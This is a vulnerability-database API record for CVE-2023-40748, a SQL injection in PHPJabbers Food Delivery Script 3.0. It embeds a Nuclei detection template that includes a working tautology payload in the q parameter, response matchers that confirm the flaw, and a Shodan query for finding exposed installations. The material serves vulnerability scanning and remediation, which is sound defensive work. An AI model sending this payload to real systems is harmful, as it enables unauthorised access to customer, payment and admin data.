{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-40748/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-40748/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-40748/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-40748/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-40748/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-40748"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-40748"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2023/CVE-2023-40748.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2023-40748\n\ninfo:\n  name: PHPJabbers Food Delivery Script - SQL Injection\n  author: ritikchaddha\n  severity: critical\n  description: |\n    PHPJabbers Food Delivery Script 3.0 has a SQL injection (SQLi) vulnerability in the \"q\" parameter of index.php.\n  impact: |\n    Unauthenticated attackers can exploit SQL injection in the q parameter to extract sensitive database information including customer orders, payment details, delivery addresses, and admin credentials from the Food Delivery platform.\n  remediation: |\n    Update PHPJabbers Food Delivery Script to a version newer than 3.0 that properly sanitizes the q parameter and uses parameterized queries.\n  reference:\n    - https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-40748\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-40748\n    cwe-id: CWE-89\n    epss-score: 0.03318\n    epss-percentile: 0.881\n    cpe: cpe:2.3:a:phpjabbers:food_delivery_script:3.0:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"PHPJabbers\"\n    vendor: phpjabbers\n    product: food_delivery_script\n  tags: cve,cve2023,phpjabbers,food-delivery,sqli,vuln,vkev\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27)+OR+6100%3d6100%23%26type%3d\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"class <strong>pjAdminOrdersaction\"\n          - \"didn't exists\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022069f67af5afea3e7b9b0972bebac585efd25fc1248faa170d5eae4dfad67a803c022100ff8af9ab472e0e3168e34daf07202cb211accc4840b78c8f6123c479b6e0ca89:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2023-40748"
}